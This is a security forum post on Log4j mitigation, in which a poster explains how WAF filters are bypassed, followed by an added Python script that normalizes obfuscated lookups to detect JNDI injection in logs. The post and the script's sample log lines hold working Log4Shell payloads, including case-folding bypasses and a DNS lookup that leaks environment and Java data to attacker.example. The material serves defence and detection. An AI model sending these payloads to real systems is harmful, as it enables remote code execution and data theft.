Cyber Forum
Log4j Vulnerability Information
Quoting Jason Slagle (post 2452):

Except that pretty much everyone is not running the LDAP server on 636 - it's almost always on a non-privileged port.

There are tons of "potential" ways to mitigate this without upgrading - some are covered above. But some of the things in that graphic (like block with WAF) are really hard because of the number of OTHER msg lookup directives I can use. On you block ${jndi:ldap://}, do you ALSO block ${jndi:rmi://}? I'm fairly certain I can exploit via RMI (I should test this and confirm - and research indicates it's config dependent). What about ${${lower:j}ndi:ldap//} etc. WAF bypass is fairly trivial.

Same with remote codebases - yeah you block the RCE, but I can suck arbitrary environment variables out via DNS. Guess what uses ENV variables a lot to pass in data - some potentially valuable - Spring Boot in a container. I can look up your underlying OS and Java version.

Basically other than patching/disabling log4j or disabling message lookups/JNDI you have SOME vulnerability, and in a lot of code bases just turning off msg lookups makes logging break in some cases because there are legit use cases.
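The post above makes a detection point: a filter that matches the literal string `${jndi:ldap://` misses the `${jndi:rmi://` variant and anything wrapped in nested lookups such as `${${lower:j}ndi:...}`. The following is an added example, not code from the post or from the forum, showing the defender-side counterpart: normalize the `${lower:...}` and `${upper:...}` nesting from the inside out, then look for any JNDI lookup regardless of scheme, and note whether `${env:...}`, `${sys:...}` or `${java:...}` lookups ride inside it (the data-exposure path the post describes). The access-log lines and the `attacker.example` hostnames are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List

# Added example: detection-side normalizer for Log4j-style lookups.
# Matches the innermost ${...}: a lookup whose body contains no further "${".
INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")
# Any JNDI lookup; the scheme that follows is captured for triage (may be empty).
JNDI = re.compile(r"\$\{jndi:([a-z]*)", re.IGNORECASE)
# Lookups that read process data and could be embedded in a JNDI hostname.
DATA_LOOKUPS = re.compile(r"\$\{(env|sys|java):", re.IGNORECASE)


def fold_case_lookups(text: str) -> str:
    """Resolve ${lower:x} and ${upper:x} from the inside out.

    Other lookups are preserved verbatim so the caller can still inspect them.
    """
    while True:
        changed = False

        def resolve(match: "re.Match[str]") -> str:
            nonlocal changed
            body = match.group(1)
            key, sep, value = body.partition(":")
            if sep and key.lower() in ("lower", "upper"):
                changed = True
                return value.lower() if key.lower() == "lower" else value.upper()
            # Not a case lookup: disguise the delimiters so the next pass can
            # reach any lookup that wraps this one; restored before returning.
            return "\x00" + body + "\x01"

        text = INNERMOST.sub(resolve, text)
        if not changed:
            break
    return text.replace("\x00", "${").replace("\x01", "}")


@dataclass
class Finding:
    line_no: int
    scheme: str          # e.g. "ldap", "rmi", "dns"; "" if nothing followed "jndi:"
    nested: List[str]    # env/sys/java lookups present on the same line
    normalized: str      # the line after case-lookup folding


def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Return one Finding per line that carries a JNDI lookup after normalization."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(lines, start=1):
        norm = fold_case_lookups(raw)
        hit = JNDI.search(norm)
        if not hit:
            continue
        nested = sorted({m.lower() for m in DATA_LOOKUPS.findall(norm)})
        findings.append(Finding(line_no, hit.group(1).lower(), nested, norm))
    return findings


# Constructed access-log lines (addresses from TEST-NET-3, hosts under .example).
SAMPLE_LINES = [
    '203.0.113.7 "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:R}mi://attacker.example/a}"',
    '203.0.113.10 "GET / HTTP/1.1" 200 "${jndi:dns://${env:HOSTNAME}.${java:os}.attacker.example}"',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LINES):
        extra = f" nested={','.join(f.nested)}" if f.nested else ""
        print(f"line {f.line_no}: jndi scheme={f.scheme or '?'}{extra}")
```

Running it flags lines 2, 3 and 4 as `ldap`, `rmi` and `dns` respectively, with line 4 also carrying `env` and `java` lookups. The normalizer only undoes the case-folding nesting the post names; a filter like this is a stopgap that narrows the gap the post describes, it does not close it, which is why the post's conclusion about patching or disabling message lookups stands.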